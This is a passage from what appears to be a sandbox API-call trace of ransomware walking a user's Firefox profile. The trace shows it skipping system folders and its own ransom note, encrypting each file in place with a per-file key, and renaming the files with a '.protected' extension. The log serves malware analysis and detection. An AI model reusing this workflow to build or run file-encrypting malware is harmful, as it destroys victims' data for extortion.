halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\search.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\search.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\search.json.protected")) returned 1 [0090.925] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.925] lstrcmpiW (lpString1="secmod.db", lpString2="Windows") returned -1 [0090.925] lstrcmpiW (lpString1="secmod.db", lpString2="Program Files") returned 1 [0090.925] lstrcmpiW (lpString1="secmod.db", lpString2="Program Files (x86)") returned 1 [0090.925] lstrcmpiW (lpString1="secmod.db", lpString2="$Recycle.bin") returned 1 
[0090.925] lstrcmpiW (lpString1="secmod.db", lpString2="System Volume Information") returned -1 [0090.925] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\secmod.db") returned 101 [0090.925] StrStrIW (lpFirst="secmod.db", lpSrch=".protected") returned 0x0 [0090.925] lstrcmpW (lpString1="secmod.db", lpString2="RESTORE_FILES.txt") returned 1 [0090.925] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0090.925] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0090.925] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\secmod.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\secmod.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0090.926] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\secmod.db") returned 101 [0090.926] StrStrW (lpFirst="secmod.db", lpSrch=".txt") returned 0x0 [0090.926] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\secmod.db") returned 101 [0090.926] StrStrW (lpFirst="secmod.db", lpSrch=".rar") returned 0x0 [0090.926] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\secmod.db") returned 101 [0090.926] StrStrW (lpFirst="secmod.db", lpSrch=".zip") returned 0x0 [0090.926] ReadFile (in: hFile=0x154, lpBuffer=0x503c40, 
nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0090.937] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.937] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0090.937] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.938] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0090.938] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0090.938] CloseHandle (hObject=0x154) returned 1 [0090.957] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\secmod.db.protected") returned 111 [0090.957] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\secmod.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\secmod.db"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\secmod.db.protected" (normalized: "c:\\users\\5p5nrgjn0js 
halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\secmod.db.protected")) returned 1 [0090.958] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.958] lstrcmpiW (lpString1="sessionstore.bak", lpString2="Windows") returned -1 [0090.958] lstrcmpiW (lpString1="sessionstore.bak", lpString2="Program Files") returned 1 [0090.958] lstrcmpiW (lpString1="sessionstore.bak", lpString2="Program Files (x86)") returned 1 [0090.958] lstrcmpiW (lpString1="sessionstore.bak", lpString2="$Recycle.bin") returned 1 [0090.958] lstrcmpiW (lpString1="sessionstore.bak", lpString2="System Volume Information") returned -1 [0090.958] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.bak") returned 108 [0090.958] StrStrIW (lpFirst="sessionstore.bak", lpSrch=".protected") returned 0x0 [0090.958] lstrcmpW (lpString1="sessionstore.bak", lpString2="RESTORE_FILES.txt") returned 1 [0090.958] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0090.958] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0090.959] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.bak" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\sessionstore.bak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0090.959] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.bak") returned 108 [0090.959] StrStrW (lpFirst="sessionstore.bak", lpSrch=".txt") returned 0x0 [0090.959] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.bak") returned 108 [0090.959] StrStrW (lpFirst="sessionstore.bak", lpSrch=".rar") returned 0x0 [0090.959] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.bak") returned 108 [0090.959] StrStrW (lpFirst="sessionstore.bak", lpSrch=".zip") returned 0x0 [0090.959] ReadFile (in: hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0x3d6, lpOverlapped=0x0) returned 1 [0090.983] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xfffffc2a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.983] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0x3d6, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0x3d6, lpOverlapped=0x0) returned 1 [0090.983] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.983] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0090.983] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0090.983] CloseHandle (hObject=0x154) returned 1 [0090.983] wnsprintfW (in: 
pszDest=0x503c40, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.bak.protected") returned 118 [0090.983] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.bak" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\sessionstore.bak"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.bak.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\sessionstore.bak.protected")) returned 1 [0090.984] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.984] lstrcmpiW (lpString1="sessionstore.js", lpString2="Windows") returned -1 [0090.984] lstrcmpiW (lpString1="sessionstore.js", lpString2="Program Files") returned 1 [0090.984] lstrcmpiW (lpString1="sessionstore.js", lpString2="Program Files (x86)") returned 1 [0090.985] lstrcmpiW (lpString1="sessionstore.js", lpString2="$Recycle.bin") returned 1 [0090.985] lstrcmpiW (lpString1="sessionstore.js", lpString2="System Volume Information") returned -1 [0090.985] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.js") returned 107 [0090.985] StrStrIW (lpFirst="sessionstore.js", lpSrch=".protected") returned 0x0 [0090.985] lstrcmpW (lpString1="sessionstore.js", lpString2="RESTORE_FILES.txt") returned 1 [0090.985] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0090.985] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, 
pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0090.985] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\sessionstore.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0090.986] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.js") returned 107 [0090.986] StrStrW (lpFirst="sessionstore.js", lpSrch=".txt") returned 0x0 [0090.986] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.js") returned 107 [0090.986] StrStrW (lpFirst="sessionstore.js", lpSrch=".rar") returned 0x0 [0090.986] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.js") returned 107 [0090.986] StrStrW (lpFirst="sessionstore.js", lpSrch=".zip") returned 0x0 [0090.986] ReadFile (in: hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0xbc5, lpOverlapped=0x0) returned 1 [0090.987] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xfffff43b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.987] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0xbc5, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0xbc5, lpOverlapped=0x0) returned 1 [0090.987] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.987] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0090.987] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0090.987] CloseHandle (hObject=0x154) returned 1 [0090.988] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.js.protected") returned 117 [0090.988] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\sessionstore.js"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.js.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\sessionstore.js.protected")) returned 1 [0090.988] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.988] lstrcmpiW (lpString1="signons.sqlite", lpString2="Windows") returned -1 [0090.988] lstrcmpiW (lpString1="signons.sqlite", lpString2="Program Files") returned 1 [0090.988] lstrcmpiW (lpString1="signons.sqlite", lpString2="Program Files (x86)") returned 1 [0090.988] lstrcmpiW (lpString1="signons.sqlite", lpString2="$Recycle.bin") returned 1 [0090.988] lstrcmpiW (lpString1="signons.sqlite", lpString2="System Volume Information") returned -1 [0090.988] wnsprintfW (in: 
pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\signons.sqlite") returned 106 [0090.988] StrStrIW (lpFirst="signons.sqlite", lpSrch=".protected") returned 0x0 [0090.988] lstrcmpW (lpString1="signons.sqlite", lpString2="RESTORE_FILES.txt") returned 1 [0090.989] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0090.989] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0090.989] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\signons.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\signons.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0090.989] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\signons.sqlite") returned 106 [0090.989] StrStrW (lpFirst="signons.sqlite", lpSrch=".txt") returned 0x0 [0090.989] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\signons.sqlite") returned 106 [0090.989] StrStrW (lpFirst="signons.sqlite", lpSrch=".rar") returned 0x0 [0090.989] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\signons.sqlite") returned 106 [0090.989] StrStrW (lpFirst="signons.sqlite", lpSrch=".zip") returned 0x0 [0090.989] ReadFile (in: hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: 
lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0091.003] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.004] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0091.004] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.004] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0091.004] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0091.005] CloseHandle (hObject=0x154) returned 1 [0091.005] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\signons.sqlite.protected") returned 116 [0091.005] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\signons.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\signons.sqlite"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\signons.sqlite.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\signons.sqlite.protected")) returned 1 [0091.006] 
FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0091.006] lstrcmpiW (lpString1="times.json", lpString2="Windows") returned -1 [0091.006] lstrcmpiW (lpString1="times.json", lpString2="Program Files") returned 1 [0091.006] lstrcmpiW (lpString1="times.json", lpString2="Program Files (x86)") returned 1 [0091.006] lstrcmpiW (lpString1="times.json", lpString2="$Recycle.bin") returned 1 [0091.006] lstrcmpiW (lpString1="times.json", lpString2="System Volume Information") returned 1 [0091.006] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\times.json") returned 102 [0091.006] StrStrIW (lpFirst="times.json", lpSrch=".protected") returned 0x0 [0091.006] lstrcmpW (lpString1="times.json", lpString2="RESTORE_FILES.txt") returned 1 [0091.006] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0091.006] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0091.006] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\times.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\times.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0091.007] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\times.json") returned 102 [0091.007] StrStrW (lpFirst="times.json", lpSrch=".txt") returned 0x0 [0091.007] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\times.json") returned 102 [0091.007] StrStrW (lpFirst="times.json", lpSrch=".rar") returned 0x0 [0091.007] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\times.json") returned 102 [0091.007] StrStrW (lpFirst="times.json", lpSrch=".zip") returned 0x0 [0091.007] ReadFile (in: hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0x1d, lpOverlapped=0x0) returned 1 [0091.008] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffffe3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.008] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0x1d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0x1d, lpOverlapped=0x0) returned 1 [0091.008] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.008] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0091.008] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0091.008] CloseHandle (hObject=0x154) returned 1 [0091.008] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\times.json.protected") returned 112 [0091.008] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\times.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\times.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\times.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\times.json.protected")) returned 1 [0091.009] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0091.009] lstrcmpiW (lpString1="webapps", lpString2="Windows") returned -1 [0091.009] lstrcmpiW (lpString1="webapps", lpString2="Program Files") returned 1 [0091.009] lstrcmpiW (lpString1="webapps", lpString2="Program Files (x86)") returned 1 [0091.009] lstrcmpiW (lpString1="webapps", lpString2="$Recycle.bin") returned 1 [0091.009] lstrcmpiW (lpString1="webapps", lpString2="System Volume Information") returned 1 [0091.009] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps") returned 99 [0091.009] lstrcmpW (lpString1="webapps", lpString2=".") returned 1 [0091.009] lstrcmpW (lpString1="webapps", lpString2="..") returned 1 [0091.009] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\*") returned 101 [0091.009] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0091.010] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.010] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 
